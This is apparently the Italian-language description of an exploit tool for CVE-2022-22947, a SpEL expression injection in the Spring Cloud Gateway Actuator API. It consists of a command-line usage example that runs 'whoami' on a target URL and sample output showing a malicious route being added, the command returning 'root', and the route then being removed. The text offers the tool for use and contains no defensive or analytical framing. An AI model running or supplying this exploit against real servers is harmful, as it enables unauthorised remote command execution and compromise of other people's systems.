
Spring Cloud Gateway Actuator API SpEL iniezione di espressioni ed esecuzione di comandi Exp
Spring Cloud Gateway Actuator API SpEL Espressione Iniezione Comando Exploit
Use:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" Result: Aggiunta della route con espressione SpEL dannosa riuscita! Aggiornamento delle route riuscito! Risultato dell'attacco ottenuto con successo:
================================================ root
================================================ Route dannosa eliminata! Aggiornamento delle route riuscito!